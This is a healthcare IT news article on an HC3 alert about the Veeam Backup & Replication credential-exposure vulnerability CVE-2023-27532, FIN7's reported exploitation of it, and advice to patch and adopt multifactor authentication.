HC3 warns of Veeam software vulnerability targeting encrypted credentials

Unauthenticated users can gain access to a network operating Veeam within the backup infrastructure network perimeter and obtain encrypted credentials stored in the configuration database, according to the vendor.


After an increasing number of cyberattacks exploiting a Veeam Backup & Replication software vulnerability, tracked as CVE-2023-27532, the Health Sector Cybersecurity Coordination Center recommends that all healthcare organization users keep systems up to date and patch vulnerabilities.

“What makes this threat significant is that in addition to backing up and recovering VMs, it is used to protect and restore individual files and applications for environments such as Microsoft Exchange and SharePoint, which are used in the HPH sector,” the agency said a May 10 analysis note. 

The software also has the ability to provide transaction-level restores of Oracle and Microsoft SQL databases. 

Veeam issued a warning to its customers on March 7, noting the vulnerable process is Veeam.Backup.Service.exe – TCP 9401 by default – and advising them to update their software.

WithSecure Labs identified FIN7 – a financially motivated cybercrime group – in recent attacks on Veeam servers.

“On 28th March 2023, initial activity was observed across internet-facing servers running Veeam Backup & Replication software,” according to its website.

“An SQL server process ‘sqlservr.exe’ related to the Veeam Backup instance executed a shell command, which performed in-memory download and execution of a PowerShell script.”

The threat actor tested lateral movement with exfiltrated credentials, WithSecure Labs noted.


Whether it’s with phishing scams, exploiting vulnerabilities to steal credentials or leveraging insider threat schemes, hospitals, health plans and other healthcare organizations are prime targets for bad actors always looking for an easy way into a network.

“Organizations should review their identity and access management implementations to force use of multifactor authentication,” advised John Hendley, head of strategy at IBM Security X-Force, in a 2022 data breach cost report. 

“Just this one step greatly helps curb cybercriminals’ ability to use stolen credentials, which is one of their favorite methods of initial compromise.” 


“HC3 recommends that all HPH sector entities remain vigilant and aware of suspicious activity, keep systems up to date and immediately patch any vulnerable systems,” the agency said in the alert note. 

“In addition to this, organizations are encouraged to take a proactive approach by using CISA’s free cybersecurity services and tools to strengthen their cyber posture.”

Andrea Fox is senior editor of Healthcare IT News.
Email: [email protected]

Healthcare IT News is a HIMSS Media publication.

Source: Read Full Article